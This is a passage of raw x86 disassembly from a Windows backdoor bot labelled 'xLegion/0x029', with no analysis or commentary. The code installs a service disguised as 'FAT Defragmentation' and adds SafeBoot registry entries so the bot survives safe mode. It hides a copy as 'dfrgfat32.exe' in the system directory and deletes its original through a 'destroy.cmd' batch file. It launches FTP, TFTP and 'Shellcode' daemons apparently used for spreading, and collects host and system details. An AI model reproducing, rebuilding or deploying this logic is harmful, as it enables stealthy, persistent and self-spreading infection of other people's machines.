var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
xor esi, esi
push 2
push esi
push esi
call dword_401014 ; OpenSCManagerA
cmp eax, esi
mov [ebp+var_14], eax
jz short loc_408A87
push esi
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push esi
push 2
push 110h
push 0F01FFh
push offset aDefragmentatio ; "Defragmentation Management Handler"
push offset aFatDefragmenta ; "FAT Defragmentation"
push eax
call dword_401024 ; CreateServiceA
cmp eax, esi
mov [ebp+arg_0], eax
jz short loc_408A87
mov ebx, dword_401020
lea ecx, [ebp+var_1C]
push 1
mov [ebp+var_20], ecx
pop edi
lea ecx, [ebp+var_30]
push ecx
push 2
push eax
mov [ebp+var_18], edi
mov [ebp+var_1C], edi
mov [ebp+var_10], offset aMonitoringTheD ; "Monitoring the defragmentating process."...
mov [ebp+var_30], 5
mov [ebp+var_2C], esi
mov [ebp+var_28], esi
mov [ebp+var_24], edi
call ebx ; dword_401020
test eax, eax
jz short loc_408A87
lea eax, [ebp+var_10]
push eax
push edi
push [ebp+arg_0]
call ebx ; dword_401020
test eax, eax
jnz short loc_408A8E
loc_408A87: ; CODE XREF: sub_4089F7+1A�j
; sub_4089F7+47�j ...
xor al, al
jmp loc_408B6F
; ---------------------------------------------------------------------------
loc_408A8E: ; CODE XREF: sub_4089F7+8E�j
push [ebp+arg_0]
call dword_40101C ; CloseServiceHandle
mov edi, dword_401000
lea eax, [ebp+var_C]
mov ebx, 0F003Fh
push eax
push ebx
push esi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
push 80000002h
call edi ; dword_401000
test eax, eax
jnz loc_408B64
lea eax, [ebp+var_4]
push eax
push ebx
push esi
push offset aMinimal ; "Minimal"
push [ebp+var_C]
call edi ; dword_401000
test eax, eax
mov edi, offset aService ; "Service"
jnz short loc_408B0C
lea eax, [ebp+var_4]
push esi
push eax
push esi
push ebx
push esi
push esi
push esi
push offset aFatDefragmenta ; "FAT Defragmentation"
push [ebp+var_4]
call dword_401004 ; RegCreateKeyExA
push edi
call sub_409AA2 ; strlen
pop ecx
push eax
push edi
push 1
push esi
push esi
push [ebp+var_4]
call dword_401008 ; RegSetValueExA
push [ebp+var_4]
call dword_40100C ; RegCloseKey
loc_408B0C: ; CODE XREF: sub_4089F7+DC�j
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset aNetwork ; "Network"
push [ebp+var_C]
call dword_401000 ; RegOpenKeyExA
test eax, eax
jnz short loc_408B5B
lea eax, [ebp+var_8]
push esi
push eax
push esi
push ebx
push esi
push esi
push esi
push offset aFatDefragmenta ; "FAT Defragmentation"
push [ebp+var_8]
call dword_401004 ; RegCreateKeyExA
push edi
call sub_409AA2 ; strlen
pop ecx
push eax
push edi
push 1
push esi
push esi
push [ebp+var_8]
call dword_401008 ; RegSetValueExA
push [ebp+var_8]
call dword_40100C ; RegCloseKey
loc_408B5B: ; CODE XREF: sub_4089F7+12B�j
push [ebp+var_C]
call dword_40100C ; RegCloseKey
loc_408B64: ; CODE XREF: sub_4089F7+BF�j
push [ebp+var_14]
call dword_40101C ; CloseServiceHandle
mov al, 1
loc_408B6F: ; CODE XREF: sub_4089F7+92�j
pop edi
pop esi
pop ebx
leave
retn
sub_4089F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B74 proc near ; CODE XREF: sub_408FA5+36�p
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push 2
push 0
push 0
call dword_401014 ; OpenSCManagerA
mov ebx, eax
test ebx, ebx
jz short loc_408C04
mov esi, 0F003Fh
push esi
push [ebp+arg_0]
push ebx
call dword_401018 ; OpenServiceA
test eax, eax
mov [ebp+var_8], eax
jz short loc_408C04
push [ebp+arg_0]
lea eax, [ebp+var_10C]
push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\%s"
push 104h
push eax
call sub_409A26 ; _snprintf
add esp, 10h
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_10C]
push 0
push eax
push 80000002h
call dword_401000 ; RegOpenKeyExA
test eax, eax
jnz short loc_408C11
lea eax, [ebp+arg_0]
push 4
push eax
push 4
push 0
push offset aStart ; "Start"
push [ebp+var_4]
mov [ebp+arg_0], 2
call dword_401008 ; RegSetValueExA
test eax, eax
jz short loc_408C08
loc_408C04: ; CODE XREF: sub_408B74+1B�j
; sub_408B74+32�j
xor al, al
jmp short loc_408C21
; ---------------------------------------------------------------------------
loc_408C08: ; CODE XREF: sub_408B74+8E�j
push [ebp+var_4]
call dword_40100C ; RegCloseKey
loc_408C11: ; CODE XREF: sub_408B74+6B�j
push [ebp+var_8]
mov esi, dword_40101C
call esi ; dword_40101C
push ebx
call esi ; dword_40101C
mov al, 1
loc_408C21: ; CODE XREF: sub_408B74+92�j
pop esi
pop ebx
leave
retn
sub_408B74 endp
; =============== S U B R O U T I N E =======================================
sub_408C25 proc near ; DATA XREF: sub_408C39+E�o
push offset dword_409D20
push ds:dword_409D3C
call dword_401028 ; SetServiceStatus
retn 4
sub_408C25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C39 proc near ; DATA XREF: sub_408D57+19�o
var_20C = byte ptr -20Ch
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor edi, edi
push offset sub_408C25
push offset aFatDefragmenta ; "FAT Defragmentation"
mov ds:dword_409D20, 30h
mov ds:dword_409D24, 1
mov ds:dword_409D28, edi
mov ds:dword_409D2C, edi
mov ds:dword_409D30, edi
mov ds:dword_409D34, edi
mov ds:dword_409D38, edi
call dword_40102C ; RegisterServiceCtrlHandlerA
cmp eax, edi
mov ds:dword_409D3C, eax
jz loc_408D50
mov ebx, dword_401028
mov esi, offset dword_409D20
push esi
push eax
mov ds:dword_409D24, 2
call ebx ; dword_401028
push edi
push edi
push edi
push edi
call dword_401074 ; CreateEventA
push esi
mov ds:dword_409D40, eax
push ds:dword_409D3C
mov ds:dword_409D24, 4
call ebx ; dword_401028
sub esp, 20Ch
mov ecx, 82h
lea esi, [ebp+var_20C]
mov edi, esp
mov [ebp+var_4], 1
and ds:byte_409F0C, 0
rep movsd
movsb
call sub_409022
add esp, 20Ch
push 0FFFFFFFFh
push ds:dword_409D40
call dword_401078 ; WaitForSingleObject
mov esi, offset dword_409D20
mov ds:dword_409D24, 3
push esi
push ds:dword_409D3C
call ebx ; dword_401028
push ds:dword_409D40
call dword_4010A4 ; CloseHandle
and ds:dword_409D40, 0
and ds:dword_409D28, 0FFFFFFFAh
push esi
mov ds:dword_409D24, 1
push ds:dword_409D3C
call ebx ; dword_401028
loc_408D50: ; CODE XREF: sub_408C39+57�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_408C39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D57 proc near ; CODE XREF: sub_408FA5:loc_408FEF�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
lea eax, [ebp+var_10]
mov [ebp+var_10], offset aFatDefragmenta ; "FAT Defragmentation"
push eax
mov [ebp+var_C], offset sub_408C39
call dword_401030 ; StartServiceCtrlDispatcherA
leave
retn
sub_408D57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D7F proc near ; CODE XREF: sub_40870A+1EE�p
; sub_408EAE+E6�p ...
var_60C = byte ptr -60Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 60Ch
push ebx
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
push esi
push edi
jz short loc_408D9D
push offset aFatDefragmenta ; "FAT Defragmentation"
call sub_40899E
pop ecx
loc_408D9D: ; CODE XREF: sub_408D7F+11�j
lea eax, [ebp+var_60C]
mov esi, 400h
push eax
push esi
call dword_401060 ; GetTempPathA
lea eax, [ebp+var_60C]
mov edi, 104h
push eax
push offset aSdestroy_cmd ; "%sdestroy.cmd"
lea eax, [ebp+var_108]
push edi
push eax
call sub_409A26 ; _snprintf
add esp, 10h
lea eax, [ebp+var_108]
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
push eax
call dword_4010A8 ; CreateFileA
cmp eax, ebx
mov [ebp+arg_4], eax
jz short loc_408E2C
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
lea eax, [ebp+var_60C]
push esi
push eax
call sub_409A26 ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_4]
push ebx
push eax
lea eax, [ebp+var_60C]
push eax
call sub_409AA2 ; strlen
pop ecx
push eax
lea eax, [ebp+var_60C]
push eax
push [ebp+arg_4]
call dword_401064 ; WriteFile
test eax, eax
jnz short loc_408E33
loc_408E2C: ; CODE XREF: sub_408D7F+6F�j
pop edi
pop esi
xor al, al
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408E33: ; CODE XREF: sub_408D7F+AB�j
push [ebp+arg_4]
call dword_4010A4 ; CloseHandle
push [ebp+arg_0]
call dword_401068 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_408E58
push 80h
push [ebp+arg_0]
call dword_40106C ; SetFileAttributesA
loc_408E58: ; CODE XREF: sub_408D7F+C9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push [ebp+arg_0]
push eax
push offset aComspecCSSS ; "%%comspec%% /c %s %s %s"
lea eax, [ebp+var_60C]
push esi
push eax
call sub_409A26 ; _snprintf
add esp, 18h
lea eax, [ebp+var_20C]
push edi
push eax
lea eax, [ebp+var_60C]
push eax
call dword_401070 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_20C]
push ebx
push eax
call dword_4010AC ; WinExec
call dword_40119C ; WSACleanup
push ebx
call dword_401084 ; ExitProcess
sub_408D7F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EAE proc near ; CODE XREF: sub_408FA5+7�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
mov esi, 104h
push edi
lea eax, [ebp+var_104]
push esi
push eax
push 0
call dword_4010A0 ; GetModuleFileNameA
mov ebx, [ebp+arg_0]
push esi
lea edi, [ebx+104h]
push edi
call dword_401050 ; GetSystemDirectoryA
push edi
call dword_401054 ; lstrlenA
cmp byte ptr [eax+ebx+103h], 5Ch
jz short loc_408EFD
push offset asc_403978 ; "\\"
push edi
call dword_401058 ; lstrcatA
loc_408EFD: ; CODE XREF: sub_408EAE+41�j
push offset aDfrgfat32_exe ; "dfrgfat32.exe"
push edi
call dword_401058 ; lstrcatA
lea eax, [ebp+var_104]
push esi
push eax
push ebx
call sub_409A32 ; strncpy
push edi
call sub_4097C4
add esp, 10h
test al, al
jz short loc_408F40
push 7
push ebx
call dword_40106C ; SetFileAttributesA
test eax, eax
jnz short loc_408F35
loc_408F31: ; CODE XREF: sub_408EAE+AD�j
; sub_408EAE+C7�j ...
xor al, al
jmp short loc_408FA0
; ---------------------------------------------------------------------------
loc_408F35: ; CODE XREF: sub_408EAE+81�j
and byte ptr [ebx+208h], 0
mov al, 1
jmp short loc_408FA0
; ---------------------------------------------------------------------------
loc_408F40: ; CODE XREF: sub_408EAE+74�j
xor esi, esi
push esi
push 80h
push 2
push esi
push 3
push 40000000h
push edi
call dword_4010A8 ; CreateFileA
cmp eax, esi
jz short loc_408F31
push eax
call dword_4010A4 ; CloseHandle
push esi
lea eax, [ebp+var_104]
push edi
push eax
call dword_40105C ; CopyFileA
test eax, eax
jz short loc_408F31
push 7
push edi
call dword_40106C ; SetFileAttributesA
test eax, eax
jz short loc_408F31
push esi
push edi
call dword_4010AC ; WinExec
lea eax, [ebp+var_104]
push esi
push eax
call sub_408D7F
pop ecx
test al, al
pop ecx
setnz al
loc_408FA0: ; CODE XREF: sub_408EAE+85�j
; sub_408EAE+90�j
pop edi
pop esi
pop ebx
leave
retn
sub_408EAE endp
; =============== S U B R O U T I N E =======================================
sub_408FA5 proc near ; CODE XREF: sub_409022+17E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_408EAE
test al, al
pop ecx
jnz short loc_408FC0
cmp [esi+208h], al
jz short loc_408FC9
jmp short loc_408FFF
; ---------------------------------------------------------------------------
loc_408FC0: ; CODE XREF: sub_408FA5+F�j
cmp byte ptr [esi+208h], 0
jnz short loc_408FF6
loc_408FC9: ; CODE XREF: sub_408FA5+17�j
mov edi, offset aFatDefragmenta ; "FAT Defragmentation"
push edi
call sub_408956
test al, al
pop ecx
jz short loc_408FF6
push esi
push edi
call sub_408B74
pop ecx
test al, al
pop ecx
jnz short loc_408FEF
push esi
call sub_4089F7
pop ecx
jmp short loc_408FFF
; ---------------------------------------------------------------------------
loc_408FEF: ; CODE XREF: sub_408FA5+3F�j
call sub_408D57
jmp short loc_408FFD
; ---------------------------------------------------------------------------
loc_408FF6: ; CODE XREF: sub_408FA5+22�j
; sub_408FA5+32�j
push esi
call sub_4089F7
pop ecx
loc_408FFD: ; CODE XREF: sub_408FA5+4F�j
mov al, 1
loc_408FFF: ; CODE XREF: sub_408FA5+19�j
; sub_408FA5+48�j
pop edi
pop esi
retn
sub_408FA5 endp
; =============== S U B R O U T I N E =======================================
sub_409002 proc near ; CODE XREF: sub_409022:loc_40905E�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 2
call dword_4011FC ; WSAStartup
neg eax
sbb al, al
inc al
add esp, 190h
retn
sub_409002 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409022 proc near ; CODE XREF: sub_408C39+B9�p
; sub_409022+199�p
var_20C = byte ptr -20Ch
var_3C = word ptr -3Ch
var_34 = byte ptr -34h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_104 = byte ptr 10Ch
arg_208 = byte ptr 210h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404320
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
loc_409048: ; CODE XREF: sub_409022+3A�j
call sub_409237
test al, al
jnz short loc_40905E
push 3E8h
call dword_40107C ; Sleep
jmp short loc_409048
; ---------------------------------------------------------------------------
loc_40905E: ; CODE XREF: sub_409022+2D�j
call sub_409002
test al, al
jz short loc_40907F
call sub_40924C
test al, al
jz short loc_40907F
push offset aXxdfrgfat32xx ; "xxDfrgfat32xx"
call sub_408939
pop ecx
test al, al
jz short loc_4090B5
loc_40907F: ; CODE XREF: sub_409022+43�j
; sub_409022+4C�j
xor ebx, ebx
cmp [ebp+arg_208], bl
jnz short loc_4090A7
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_104]
push eax
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4090A7
push 1
call dword_401084 ; ExitProcess
loc_4090A7: ; CODE XREF: sub_409022+65�j
; sub_409022+7B�j
push ebx
lea eax, [ebp+arg_0]
push eax
call sub_408D7F
pop ecx
pop ecx
jmp short loc_4090B7
; ---------------------------------------------------------------------------
loc_4090B5: ; CODE XREF: sub_409022+5B�j
xor ebx, ebx
loc_4090B7: ; CODE XREF: sub_409022+91�j
call sub_404E76
test al, al
jz short loc_40912C
push 0FFFFh
mov esi, 400h
push esi
call sub_409957
mov ds:word_409ED2, ax
mov [ebp+var_3C], ax
call sub_409AC6 ; rand
cdq
mov ecx, 0FBFFh
idiv ecx
add edx, esi
mov ds:word_409D50, dx
push offset aFtpdaemon ; "FTPDaemon"
push 1
push ebx
push offset loc_407F8F
call sub_40960A
push offset aShellcodedaemo ; "ShellcodeDaemon"
push 1
lea eax, [ebp+var_3C]
push eax
push offset loc_407AC7
call sub_40960A
push offset aTftpdaemon ; "TFTPDaemon"
push 1
push ebx
push offset loc_407BD0
call sub_40960A
add esp, 38h
loc_40912C: ; CODE XREF: sub_409022+9C�j
mov [ebp+var_4], ebx
loc_40912F: ; CODE XREF: sub_409022+132�j
push ebx
push ebx
push ebx
lea eax, [ebp+var_34]
push eax
call dword_40116C ; GetMessageA
test eax, eax
jz short loc_40915D
lea eax, [ebp+var_34]
push eax
call dword_401164 ; TranslateMessage
lea eax, [ebp+var_34]
push eax
call dword_401168 ; DispatchMessageA
jmp short loc_40912F
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_40915D: ; CODE XREF: sub_409022+11C�j
or [ebp+var_4], 0FFFFFFFFh
call dword_40119C ; WSACleanup
push 1
call dword_401084 ; ExitProcess
loc_40916F: ; CODE XREF: text:0040C778�j
push ebp
mov ebp, esp
sub esp, 20Ch
push esi
push edi
push 2
call dword_40104C ; SetErrorMode
call dword_401080 ; GetTickCount
push eax
call sub_409B0E ; srand
and ds:byte_409F0C, 0
lea eax, [ebp+var_20C]
push eax
mov byte ptr [ebp+var_4], 1
call sub_408FA5
sub esp, 204h
mov ecx, 82h
lea esi, [ebp+var_20C]
mov edi, esp
rep movsd
movsb
call sub_409022
add esp, 20Ch
pop edi
pop esi
leave
retn
sub_409022 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091CA proc near ; CODE XREF: sub_404D6D+16�p
; sub_404D6D+43�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
cmp [ebp+arg_0], 0
jnz short loc_4091E0
push offset byte_409CF0
jmp short loc_4091E3
; ---------------------------------------------------------------------------
loc_4091E0: ; CODE XREF: sub_4091CA+D�j
push [ebp+arg_0]
loc_4091E3: ; CODE XREF: sub_4091CA+14�j
lea eax, [ebp+var_80]
push eax
call sub_409AAE ; strcpy
pop ecx
lea eax, [ebp+var_80]
pop ecx
push eax
call dword_401200 ; gethostbyname
test eax, eax
jz short loc_40920B
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4011D0 ; inet_ntoa
leave
retn
; ---------------------------------------------------------------------------
loc_40920B: ; CODE XREF: sub_4091CA+30�j
lea eax, [ebp+var_80]
push eax
call dword_401198 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_409233
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_4011E4 ; gethostbyaddr
test eax, eax
jz short loc_409233
mov eax, [eax]
leave
retn
; ---------------------------------------------------------------------------
loc_409233: ; CODE XREF: sub_4091CA+51�j
; sub_4091CA+63�j
xor eax, eax
leave
retn
sub_4091CA endp
; =============== S U B R O U T I N E =======================================
sub_409237 proc near ; CODE XREF: sub_409022:loc_409048�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_401188 ; InternetGetConnectedState
test eax, eax
setnz al
pop ecx
retn
sub_409237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40924C proc near ; CODE XREF: sub_409022+45�p
var_100 = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 100h
and ds:dword_409ECC, 0
lea eax, [ebp+var_100]
push 100h
push eax
call dword_401204 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_4092E9
lea eax, [ebp+var_100]
push eax
call dword_401200 ; gethostbyname
test eax, eax
jz short loc_4092E9
push esi
mov esi, [eax+0Ch]
loc_409288: ; CODE XREF: sub_40924C+96�j
mov eax, [esi]
test eax, eax
jz short loc_4092E4
movzx ecx, byte ptr [eax+3]
push ecx
movzx ecx, byte ptr [eax+2]
push ecx
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax]
push ecx
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea eax, [ebp+var_100]
push 10h
push eax
call sub_409A26 ; _snprintf
add esp, 1Ch
lea eax, [ebp+var_100]
push eax
call dword_401198 ; inet_addr
mov ds:dword_409ECC, eax
lea eax, [ebp+var_100]
push 10h
push eax
push offset dword_409ED4
call sub_409A32 ; strncpy
add esp, 0Ch
add esi, 4
jmp short loc_409288
; ---------------------------------------------------------------------------
loc_4092E4: ; CODE XREF: sub_40924C+40�j
mov al, 1
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4092E9: ; CODE XREF: sub_40924C+25�j
; sub_40924C+36�j
xor al, al
leave
retn
sub_40924C endp
; =============== S U B R O U T I N E =======================================
sub_4092ED proc near ; CODE XREF: code:004053A9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
dec eax
dec eax
jz short loc_4092F9
dec eax
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4092F9: ; CODE XREF: sub_4092ED+6�j
push 3
push 1388h
push [esp+8+arg_0]
call sub_4073B4
add esp, 0Ch
neg al
sbb eax, eax
and eax, 3
retn
sub_4092ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409314 proc near ; CODE XREF: sub_40959B+3B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor esi, esi
loc_40931E: ; CODE XREF: sub_409314+3C�j
; sub_409314+46�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call dword_40107C ; Sleep
rdtsc
sub eax, ebx
push esi
sbb edx, edi
push 186A0h
push edx
push eax
call sub_409BA0
push esi
push 0Ah
push edx
push eax
call sub_409BA0
cmp edx, esi
mov edi, eax
ja short loc_40931E
jb short loc_40935C
cmp edi, 0F4240h
ja short loc_40931E
loc_40935C: ; CODE XREF: sub_409314+3E�j
push esi
push 64h
push edx
push edi
call sub_409B20
push 64h
mov ecx, eax
cmp edx, esi
pop eax
mov [ebp+var_4], esi
ja short loc_4093D3
jb short loc_409379
cmp ecx, 50h
jnb short loc_40937F
loc_409379: ; CODE XREF: sub_409314+5E�j
push 4Bh
mov [ebp+var_4], esi
pop eax
loc_40937F: ; CODE XREF: sub_409314+63�j
cmp edx, esi
ja short loc_4093D3
jb short loc_40938A
cmp ecx, 47h
jnb short loc_409390
loc_40938A: ; CODE XREF: sub_409314+6F�j
push 42h
mov [ebp+var_4], esi
pop eax
loc_409390: ; CODE XREF: sub_409314+74�j
cmp edx, esi
ja short loc_4093D3
jb short loc_40939B
cmp ecx, 37h
jnb short loc_4093A1
loc_40939B: ; CODE XREF: sub_409314+80�j
push 32h
mov [ebp+var_4], esi
pop eax
loc_4093A1: ; CODE XREF: sub_409314+85�j
cmp edx, esi
ja short loc_4093D3
jb short loc_4093AC
cmp ecx, 26h
jnb short loc_4093B2
loc_4093AC: ; CODE XREF: sub_409314+91�j
push 21h
mov [ebp+var_4], esi
pop eax
loc_4093B2: ; CODE XREF: sub_409314+96�j
cmp edx, esi
ja short loc_4093D3
jb short loc_4093BD
cmp ecx, 1Eh
jnb short loc_4093C3
loc_4093BD: ; CODE XREF: sub_409314+A2�j
push 19h
mov [ebp+var_4], esi
pop eax
loc_4093C3: ; CODE XREF: sub_409314+A7�j
cmp edx, esi
ja short loc_4093D3
jb short loc_4093CE
cmp ecx, 0Ah
jnb short loc_4093D3
loc_4093CE: ; CODE XREF: sub_409314+B3�j
xor eax, eax
mov [ebp+var_4], esi
loc_4093D3: ; CODE XREF: sub_409314+5C�j
; sub_409314+6D�j ...
sub eax, ecx
add eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_409314 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093DC proc near ; CODE XREF: sub_404360+B0�p
; sub_40959B+47�p
var_2C = qword ptr -2Ch
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call dword_401044 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_401048 ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_C], eax
jl short loc_409440
jg short loc_409407
cmp [ebp+var_10], eax
jbe short loc_409440
loc_409407: ; CODE XREF: sub_4093DC+24�j
cmp [ebp+var_4], eax
jl short loc_409440
jg short loc_409413
cmp [ebp+var_8], eax
jbe short loc_409440
loc_409413: ; CODE XREF: sub_4093DC+30�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_409C10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+2Ch+var_2C]
call sub_409C08 ; ceil
pop ecx
pop ecx
call sub_409A90 ; _ftol
jmp short loc_40944F
; ---------------------------------------------------------------------------
loc_409440: ; CODE XREF: sub_4093DC+22�j
; sub_4093DC+29�j ...
call dword_401080 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
loc_40944F: ; CODE XREF: sub_4093DC+62�j
mov ecx, 15180h
xor edx, edx
mov edi, ecx
mov esi, eax
div edi
xor edx, edx
push 3Ch
mov edi, eax
mov eax, esi
div ecx
mov ecx, 0E10h
mov ebx, ecx
mov eax, edx
xor edx, edx
div ebx
xor edx, edx
mov ebx, eax
mov eax, esi
div ecx
pop ecx
mov esi, offset aDays ; "days"
mov eax, edx
xor edx, edx
div ecx
cmp edi, 1
jnz short loc_409491
mov esi, offset aDay ; "day"
loc_409491: ; CODE XREF: sub_4093DC+AE�j
cmp ebx, 1
mov edx, offset aHours ; "hours"
jnz short loc_4094A0
mov edx, offset aHour ; "hour"
loc_4094A0: ; CODE XREF: sub_4093DC+BD�j
cmp eax, 1
mov ecx, offset aMinutes ; "minutes"
jnz short loc_4094AF
mov ecx, offset aMinute ; "minute"
loc_4094AF: ; CODE XREF: sub_4093DC+CC�j
push ecx
push eax
push edx
push ebx
push esi
push edi
push offset dword_40418C
mov esi, offset dword_409FA8
push 104h
push esi
call sub_409A26 ; _snprintf
add esp, 24h
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4093DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094D4 proc near ; CODE XREF: sub_404360+CB�p
; sub_40959B+41�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98h
lea eax, [ebp+var_98]
mov [ebp+var_98], 94h
push eax
call dword_401040 ; GetVersionExA
cmp [ebp+var_94], 4
mov ecx, [ebp+var_90]
jnz short loc_409540
test ecx, ecx
jnz short loc_409528
cmp [ebp+var_88], 1
mov eax, offset a95 ; "95"
jz short loc_409518
mov eax, [ebp+var_4]
loc_409518: ; CODE XREF: sub_4094D4+3F�j
cmp [ebp+var_88], 2
jnz short loc_40956F
mov eax, offset aNt ; "NT"
jmp short loc_40956F
; ---------------------------------------------------------------------------
loc_409528: ; CODE XREF: sub_4094D4+31�j
cmp ecx, 0Ah
jnz short loc_409534
mov eax, offset a98 ; "98"
jmp short loc_40956F
; ---------------------------------------------------------------------------
loc_409534: ; CODE XREF: sub_4094D4+57�j
cmp ecx, 5Ah
jnz short loc_40956A
mov eax, offset aMe ; "ME"
jmp short loc_40956F
; ---------------------------------------------------------------------------
loc_409540: ; CODE XREF: sub_4094D4+2D�j
cmp [ebp+var_94], 5
jnz short loc_40956A
test ecx, ecx
jnz short loc_409554
mov eax, offset a2000 ; "2000"
jmp short loc_40956F
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_4094D4+77�j
cmp ecx, 1
jnz short loc_409560
mov eax, offset aXp ; "XP"
jmp short loc_40956F
; ---------------------------------------------------------------------------
loc_409560: ; CODE XREF: sub_4094D4+83�j
cmp ecx, 2
mov eax, offset a2003 ; "2003"
jz short loc_40956F
loc_40956A: ; CODE XREF: sub_4094D4+63�j
; sub_4094D4+73�j
mov eax, offset a??? ; "???"
loc_40956F: ; CODE XREF: sub_4094D4+4B�j
; sub_4094D4+52�j ...
push esi
mov esi, offset dword_409F1C
push [ebp+var_8C]
push ecx
push [ebp+var_94]
push eax
push offset dword_4041DC
push 8Ch
push esi
call sub_409A26 ; _snprintf
add esp, 1Ch
mov eax, esi
pop esi
leave
retn
sub_4094D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40959B proc near ; CODE XREF: sub_404360+113�p
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebp
mov ebp, esp
sub esp, 20h
push esi
push 20h
lea eax, [ebp+var_20]
push 0
push eax
call sub_409AB4 ; memset
add esp, 0Ch
lea eax, [ebp+var_20]
push eax
call dword_40103C ; GlobalMemoryStatus
mov eax, [ebp+var_18]
mov ecx, 0FF800h
xor edx, edx
mov esi, ecx
div esi
xor edx, edx
push eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_14]
div ecx
push eax
call sub_409314
push eax
call sub_4094D4
push eax
call sub_4093DC
push eax
push offset aXlegion0x029 ; "xLegion/0x029"
push offset dword_404228
mov esi, offset dword_40A0AC
push 80h
push esi
call sub_409A26 ; _snprintf
add esp, 24h
mov eax, esi
pop esi
leave
retn
sub_40959B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40960A proc near ; CODE XREF: sub_404360+614�p
